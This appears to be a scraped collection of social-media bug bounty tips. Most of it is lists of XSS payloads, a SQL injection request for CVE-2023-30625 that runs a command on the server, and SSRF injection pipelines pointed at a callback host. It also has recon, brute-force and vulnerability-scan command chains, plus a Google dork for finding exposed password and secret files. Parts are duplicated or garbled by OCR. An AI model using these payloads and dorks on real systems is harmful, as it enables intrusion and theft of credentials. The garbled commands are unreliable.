Bug bounty Tips

Do please vote me guys

Guys check out how normal and hacker solve the tough puzzle i hope you like it. follow

XSS Payload:- <script>/&/-alert(1)</script> <script>/&/-alert(1)</script> %00%00%00%00%00%00%00<script>alert(1)</script> (1.Null bytes are output 2.There is no space character immediately before) <sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9"> <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click <script>alert.call(null,1)</script> (alert.call(%20, "XSS");) <script>confirm.call(null,1)</script> <script>prompt.call(null,1)</script> <script>alert.apply(null, [1])</script> Join:- https://t.me/+5x4RA8x2O_UwMDg5

🚀 Thinking of Transitioning to Full-Time Bug Bounty Hunting? Read This! Embarking on the journey from a traditional job to full-time bug bounty hunting can be daunting yet exhilarating. As someone who transitioned from corporate life to hunting bugs full-time, I understand the allure and the realities that come with it. First things first: Bug bounty hunting isn't for everyone. It requires a unique blend of technical prowess, patience, and resilience. Let's debunk some common myths and shed light on the realities of being a bug bounty hunter: Myth: No More Answering to Bosses Reality: While you're not reporting to a traditional boss, you'll answer to the platform's rules, guidelines, and sometimes, demanding clients. Myth: Flexible Working Hours Reality: Bug hunting knows no clock. You'll find yourself chasing bugs at odd hours, responding to reports, and constantly honing your skills. Myth: Exotic Work Locations Reality: While the idea of hunting bugs from a beach sounds enticing, the reality is often a coffee-fueled marathon in front of your screen. Myth: Hitting 6 - 7 Figures Reality: While some top hunters achieve impressive earnings, it takes dedication, skill, and sometimes, a stroke of luck to reach those heights. As a bug bounty hunter, you'll wear many hats: - Analyst: Analyzing code, identifying vulnerabilities, and crafting exploit strategies. - Communicator: Effectively conveying findings to platform administrators or clients. - Strategist: Planning your approach, prioritizing targets, and maximizing your efforts. - Entrepreneur: Managing your time, finances, and reputation in the bug hunting community. It's not just about tracking down bugs; it's about nonstop learning, versatility, and strength despite dismissal and misfortunes To thrive as a bug bounty hunter, you need more than technical skills: - Managerial Skills: Managing your time, resources, and priorities effectively. - Leadership Skills: Inspiring others, building relationships, and fostering collaboration within the community. - Patience: Bugs don't always reveal themselves immediately. Patience is key. - Risk Management: Knowing when to push boundaries and when to tread cautiously. - Stress Management: The hunt can be stressful. Finding healthy coping mechanisms is essential. Before taking the leap, consider this advice: - Start as a side hustle: Test the waters, build your skills, and gauge your earning potential. - Financial Security: Ensure you have a financial cushion before diving into full-time bug hunting. - Set Realistic Expectations: Success in bug bounty hunting takes time. Be prepared for a journey filled with ups and downs. In conclusion, transitioning to full-time bug bounty hunting is a bold move that can lead to immense personal and professional growth. However, it's not a decision to be taken lightly. Equip yourself with the skills, mindset, and resources needed to thrive in this dynamic field. Remember, the bug bounty community is incredibly supportive. Lean on your peers, embrace the challenges, and keep hunting! 🚀🔍

Rudder Server < 1.3.0-rc.1 - SQL Injection cve-2023-30625 POST /v1/warehouse/pending-events HTTP/1.1 Host: {{Hostname}} {"source_id": "test'; copy (SELECT '') to program 'id'-- - "}

✔️ Complete Bug Bounty tool List ✊ Enjoy :) dnscan https://github.com/rbsec/dnscan Knockpy https://github.com/guelfoweb/knock Sublist3r https://github.com/aboul3la/Sublist3r massdns https://github.com/blechschmidt/massdns nmap https://nmap.org masscan https://github.com/robertdavidgraham/masscan EyeWitness https://github.com/ChrisTruncer/EyeWitness DirBuster https://sourceforge.net/projects/dirbuster/ dirsearch https://github.com/maurosoria/dirsearch Gitrob https://github.com/michenriksen/gitrob git-secrets https://github.com/awslabs/git-secrets sandcastle https://github.com/yasinS/sandcastle bucket_finder https://digi.ninja/projects/bucket_finder.php GoogD0rker https://github.com/ZephrFish/GoogD0rker/ Wayback Machine https://web.archive.org waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/ XRay https://github.com/evilsocket/xray wfuzz https://github.com/xmendez/wfuzz/ patator https://github.com/lanjelot/patator datasploit https://github.com/DataSploit/datasploit hydra https://github.com/vanhauser-thc/thc-hydra changeme https://github.com/ztgrace/changeme MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/ Apktool https://github.com/iBotPeaches/Apktool dex2jar https://sourceforge.net/projects/dex2jar/ sqlmap http://sqlmap.org/ oxml_xxe https://github.com/BuffaloWill/oxml_xxe/ XXE Injector https://github.com/enjoiz/XXEinjector The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool ground-control https://github.com/jobertabma/ground-control ssrfDetector https://github.com/JacobReynolds/ssrfDetector LFISuit https://github.com/D35m0nd142/LFISuite GitTools https://github.com/internetwache/GitTools dvcs-ripper https://github.com/kost/dvcs-ripper tko-subs https://github.com/anshumanbh/tko-subs HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer Race the Web https://github.com/insp3ctre/race-the-web ysoserial https://github.com/GoSecure/ysoserial PHPGGC https://github.com/ambionics/phpggc CORStest https://github.com/RUB-NDS/CORStest Retire-js https://github.com/RetireJS/retire.js getsploit https://github.com/vulnersCom/getsploit Findsploit https://github.com/1N3/Findsploit bfac https://github.com/mazen160/bfac WPScan https://wpscan.org/ CMSMap https://github.com/Dionach/CMSmap Amass https://github.com/OWASP/Amass Extra Tools http://projectdiscovery.io

Step 1: Subdomain Enumeration •DNS Dumpster •Sublist3r •Amass •Google Dorking •Certificate Transparency Logs •subdomainer Step 2: Find Live Domains cat all-domains.txt | httpx > all-live.txt Step 3: Identify All URLs cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt Step 4: Injection Burp Collaborator URL in Parameters cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt Step 5: Test for SSRF Vulnerabilities cat ssrf.txt | httpx -fr Step 6: How to check which URL is vulnerable split -l 10 ssrf.txt output_file_

Guys I am planning a free workshop on this Sunday, which topic should I choose

cat httpx.txt | aquatone -scan-timeout 3000 -threads 5 -silent -screenshot-timeout 50000 -http-timeout 20000 -out screenshots-folder echo "domain" | waybackurls "$line" | sudo ./qsreplace | grep --color=auto "=" | parallel -j50 -q curl -Isk --max-time 2 -w '%{url_effective}' | grep --color=auto -iE "Location" | sed -e 's!Location:!!' | sudo httpx -status-code; done

sudo dirsearch -u "target.com" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x 403 sudo dirsearch -u "target.com/access/reset" "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFUYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -x 403 sudo dirsearch -u "target.com" -w /home/SecLists-master/Discovery/Web-Content/common.txt -r -x 403 -o dir.txt **Content Discovery Introduction to FFUF ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u https://targetcom/d/setting/FUZZ -t 50 -ac -c ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u www.target[].com/FUZZ -t 75 ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -o ffuf.txt └─$ python3 ffuf-json.py ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt | tee dir.txt ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all ffuf -u "https://ftarget[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all -fc 404 ffuf -u "target.target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac -fs 0 -fl 1 ffuf -u "https://target][.com/access/reset/FUZZUser" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt ffuf -u "https://target[].com/access/resetFUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fc 403 ffuf -u "target.com/access/reset/F…" -w /home/SecLists-master/Discovery/Web-Content/common.txt -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFU1MiLCJpc3MiOiJBQ0NFU1MiLCJwYXlsb2FkIjp7ImxvZ2luIjpudfdXNlcm5hbWUiOm51bGwsImxhc3Rfc2F2ZWRfdXNlcm5hbWUiOm51bGwsImNvcnJlbGF0aW9uX2lkIjoiZjdlMjQ4ZjAtNDY3ZS00OTA5LTg2YWYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -H "Test:admin" Passive Enumeration GetAllUrls echo "https://target][.com" | gau echo "target.target[.[com/access/reset" | gau > gau.txt sudo echo "target.com" | getallurls | sort -u | grep -v www > gau.txt Not get duplicate cat gau.txt | grep “=” | sort -u Passive Enumeration Waybackurls sudo echo "www.target[].com" | waybackurls > gau.txt echo "https://target.[]com" | gau > gau.txt && sudo echo "target.com" | waybackurls > way.txt && cat gau.txt | grep “=” | sort -u > sorted.txt katana -u "https://uber.onelogin[].com/" -jc -d 4 -o katana-ube.txt python3 cloudflair.py glassdoor.[]com Single URL: echo https://google.[]com | hakrawler Multiple URLs: cat urls.txt | hakrawler Timeout for each line of stdin after 5 seconds: cat urls.txt | hakrawler -timeout 5 Send all requests through a proxy: cat urls.txt | hakrawler -proxy http://localhost:8080 echo https://google.[]com | hakrawler -subs echo google.][com | haktrails subdomains | httpx | hakrawler echo www.google.][com | docker run --rm -i hakluke/hakrawler:v2 -subs echo www.google.[com | docker run --rm -i hakluke/hakrawler -subs pripshttps://www.google.][comoriginfinder -h https://example.][]com:443/foo $ prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one[]:80/index.html -p 80,443,8080,8443 xnLinkFinder python3 xnLinkFinder.py -i redbull.com -sp redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

🚀🚀DISCOVERING DOMAIN🔥🔥🔥🔥 #DAY11 Look for Asn!!! bgp.he.net/search?search%… dnslytics.com/dns-lookup whoxy.com AMASS sudo amass enum -brute -d www.targett[].mil -o target.txt -p 80,443,8080,8443,8000 sudo amass enum -active -brute -d www.targett[].mil -o targett.mil.txt -p 80,443,8080,8443,8000 amass enum -v -src -ip -brute -min-for-recursive 2 -d targett.com ----------------------------------------------------------------- *amass asn amass intel -org “TARGET” -v amass intel -asn 205952 -o ans.txt -v amass enum -d targett.]com -o ubesubdoamin.txt -v hunting - Subdomain Enumeration Subfinder subfinder -d targett.]com -o domain.txt subfinder -d targett.]com -sources securitytrails *for look how many domain wc domain.txt *Subdomain Enumeration AMASS cat amass_subdomains.txt | grep “targett.]com” cat amass_subdomains.txt | grep -o “targett.]com” cat ssrf-uber1.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*uber\.com" cat amass_subdomains.txt | grep -Eo “([a-zA-Z0-9.-]+\.)*hackerone\.com" *Subdomain Enumeration Bruteforcing /usr/share/seclists/Discovery/DNS /home/casperino/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing FFuF ffuf -u "http://FUZZ.targett.]com" -w /home/Desktop/best-dns-wordlist.txt -t 50 gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing GoBuster gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt Subdomain Bruteforcing AMASS amass enum -d targett.]com -brute -w /home/Desktop/best-dns-wordlist.txt -v *Subdomain Bruteforcing PureDNS puredns bruteforce /home/Desktop/best-dns-wordlist.txt targett.]com --resolvers resolvers.txt *Subdomain Enumeration VHOST sudo nano /etc/hosts 192.168.1.1 targett.com ffuf -u "targett.com" -H "Host: FUZZ.targett.com" -w /home/Desktop/best-dns-wordlist.txt *Combining Tools amass enum -d targett.com -o amass.txt -nocolor -v cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new_.txt 3-sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new_.txt" subfinder -d targett.com -o subfinder.txt -v cat amass_new.txt subfinder.txt | sort -u > sorted.txt 5-sudo bash -c "cat amass_new_.txt subfinder.txt | sort -u > sorted.txt" cat amass_new_.txt subfinder.txt > new.txt 6-sudo bash -c "cat amass_new_.txt subfinder.txt > new.txt" wc new.txt wc sorted.txt amass enum -d targett.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d targett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt sudo bash -c "amass enum -d tagett.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d tagett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt" amass enum -d targett.com -o amass.txt -nocolor -v && subfinder -d targett.com -o subfinder.txt && cat amass.txt subfinder.txt | sort -u > sorted.txt *Filtering Live DomainsSubdomains cat subdomain2.txt | httpx -o http.txt cat subdomain2.txt | httpx -o http.txt -tittle **Finding Origin IP Address 1 only with cloudflare search.censys.io/hosts/34.120.2… ping bepractical.tech whois bepractical.tech python3 cloudflair.py bepractical.tech ***Finding Origin IP Address 2 securitytrails.com/domain/www.air… ***Port Scanning with NMAP sudo nmap -sF sudo nmap -sN -sS -vv nmap -iL mil-domains.txt -p80,443,8080,8000,8443,1000 sudo nmap -sV -sC -p- 154.56.61.191 -vv sudo nmap -sV -sC -p- 154.56.61.191 -vv -T 5 ***Vulnerability Scanning with NMAP sudo nmap -sV -sC -p 80 154.56.61.191 --script=vuln -vv -T 5 nmap --script vulners -sV 192.168.0.0 **Port Scanning with NAABU naabu -l subfinder.txt -o port.txt -top-ports -v **Content Discovery Basics of Dirsearch sudo dirsearch -u "target.com" sudo dirsearch -u "target.com" -x 403,301 sudo dirsearch -u "target.com" --exclude-status=403,401

50 gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing GoBuster gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt Subdomain Bruteforcing AMASS amass enum -d targett.]com -brute -w /home/Desktop/best-dns-wordlist.txt -v *Subdomain Bruteforcing PureDNS puredns bruteforce /home/Desktop/best-dns-wordlist.txt targett.]com --resolvers resolvers.txt *Subdomain Enumeration VHOST sudo nano /etc/hosts 192.168.1.1 targett.com ffuf -u "targett.com" -H "Host: FUZZ.targett.com" -w /home/Desktop/best-dns-wordlist.txt *Combining Tools amass enum -d targett.com -o amass.txt -nocolor -v cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new_.txt 3-sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new_.txt" subfinder -d targett.com -o subfinder.txt -v cat amass_new.txt subfinder.txt | sort -u > sorted.txt 5-sudo bash -c "cat amass_new_.txt subfinder.txt | sort -u > sorted.txt" cat amass_new_.txt subfinder.txt > new.txt 6-sudo bash -c "cat amass_new_.txt subfinder.txt > new.txt" wc new.txt wc sorted.txt amass enum -d targett.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d targett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt sudo bash -c "amass enum -d tagett.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d tagett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u

💫 CipherOps said YES to our journey together! Embarking on a path filled with innovation, growth, and shared success. ❤️🚀 #DreamsComeTrue"

grep -o '^[^#]*' file.txt | awk -F' ' '{print $2}' | sed -e 's/^[^.]*\.//'

Program has "All in scope" in their policy? Use this checklist 📋 to collect list of root domains: ✅ Inspect the footer of their pages. Sometimes companies like to use same footer across their all domains. For example: "© 2024 The Coca‑Cola Company. All rights reserved." could be used as "The Coca‑Cola Company. All rights reserved." dork on Google! ✅ Check the organisation name on the SSL certificate. Copy it to http://crt.sh and shodan. For example to query "The Coca‑Cola Company" via http://crt.sh CLI: curl -s "https://crt.sh/?q=The+Coca‑Cola+Company&output=json" | jq -r '.[] | .common_name' | sort -u NOTE: Some domains could be very old, outdated or already belong to other company, so make sure to inspect them manually. ✅ For shodan, use org:"The Coca‑Cola Company" or ssl:http://coca-colacompany.com to check the assets. Inspect the hostnames on shodan query response and collect them to your list. ✅ For FOFA https://en.fofa.info, place the company name in the search bar, as for example - "The Coca‑Cola Company". Select the favicons, of your company and filter the results. You could also copy those favicon values to shodan search and use favicon:"<value>" as the shodan dork. #BugBounty #bugbountytip #itsecurity

🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey! #Day7🕵️‍♂️💻 👨‍💻 Now, I'm sharing my code and notes to help You!!🎯 🔗 Check out ==-Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --0pen nmap -p- --script=vuln $IP ###HTTP-Methods nmap --script http-methods --script-args http-methods. url-path='/webs ite ' ### sed IPs: grep -oE '((1? [0-9] [0-9]? |2[0-4] [0- 9] |25[0-5])\.){3} (1? [0-9] [0-9]? |2 [0-4] [0-9] |25 [0-5] ) ' FILE --Script smb-enum-shares =EE======= =E==EE====E============E== EEE=E==E==: =========: == WPScan & SSL wpscan--url $URL --disable-tls-checks - -enumerate p --enumerate t --enumerate u ===WPScan Brute Forceing: wpscan --url $URL --disable-t ls-checks - U users -P /usr/share/wordlists/ rockyou. txt ==Aggressive Plugin Detection: wpscan --url $URL plugins-detection aggressive --enumerate p ======================================== c==Nikto with SSL and Evasion nikto --host $IP -ssl -evasion 1 SEE EVASION MODALITIES. E=================================== ==dns_recon dnsrecon -d yourdomain. com == ===9obuster directory gobuster dir -u $URL -W /opt/SecLists/Dis covery/Web- Content/ raft-medium-directories. txt -k - t 30 ===gobuster files gobuster dir -u $URL -W /opt/SecLists/Dis covery/Web- Content/raft-medium-files. txt -k -t 30 ==00buster for SubDoma in brute forcing: gobuster dns -d doma in.org -w /opt/SecLists/Discovery/DNS/subdomains- toplmillion-110000. txt -t 30 "just make sure any DNS name you find resolves to an in-scope address before you test it! ====E=======: =H==E====E====E===E==== ==Extract IPs from a text file. grep -o '[0-9]\{1, 3\}\. [0-9]\{1,3\}\. [0- 9]\{1,3\}\. [0-9]\{1, 3\}' nmapfile. txt ===Wfuzz XSS Fuzzing===: wfuzz -C -Z file, /opt/SecLists/Fuzzing/XSS,/XSS- BruteLogic. txt "$URL" wfuzz -C -Z file, /opt/SecLists/ Fuzzing/XSS,/XSS- JhaddiX. txt "$URL" ===C0MMAND INJECTION WITH POST DATA wfuzz -C -Z file, /opt/SecLists/Fuzzing/command- injection-commix. txt -d "doi=FUZZ" "$URL" ===Test for Paramter Existence! wfuzz -C -Z file, /opt/SecLists/Dis covery /Web- Content/burp-parameter-names. txt "$URL" ===AUTHENTICATED FUZZING DIRECTORIES: wfuzz -C -Z file, /opt/SecLists/Dis cove ry/Web- Content/ raft-medium-directories . txt --hc 404 -d "SESSIONID=value" "$URL" =AUTHENTICATED FILE FUZZING: wfuzz -C -Z file, /opt/SecLists/Discove ry/Web- Content/ raft-med ium-files . txt --hc 404 - d "SESSIONID=value" "$URL" ===FUZZ Directories : wfuzz -C -Z file, /opt/SecLists/Dis covery/Web- Content/ raft-la rge-d irectories. txt --hc 404 "$URL" ===FUZZ FILES: wfuzz -C -Z file, /opt/SecLists/Dis covery/Web- Content/ raft-la rge-files . txt --hc 404 "$URL" 📚 Learn, practice, and let's achieve OSCP success together! 💪🏆 #OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp 🔍 Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp 🔍Google dork for searching these filenames on Google: intext:"filename:config.php" OR intext:"filename:config.inc.php" OR intext:"filename:prod.secret.exs" OR intext:"filename:configuration.php" OR intext:"filename:.sh_history" OR intext:"filename:shadow" OR intext:"filename:proftpdpasswd" OR intext:"filename:.psafe3" OR intext:"filename:.pgpass" OR intext:"filename:manifest.xml" OR intext:"filename:travis.yml" OR intext:"filename:vim_settings.xml" OR intext:"filename:database" OR intext:"filename:prod.exs" OR intext:"filename:prod.secret.exs" OR intext:"filename:.npmrc _auth" OR intext:"filename:.dockercfg" OR intext:"filename:WebServers.xml" OR intext:"filename:.bash_history" OR intext:"filename:sftp-config.json" OR intext:"filename:sftp.json" OR intext:"filename:secrets.yml" OR intext:"filename:.esmtprc" OR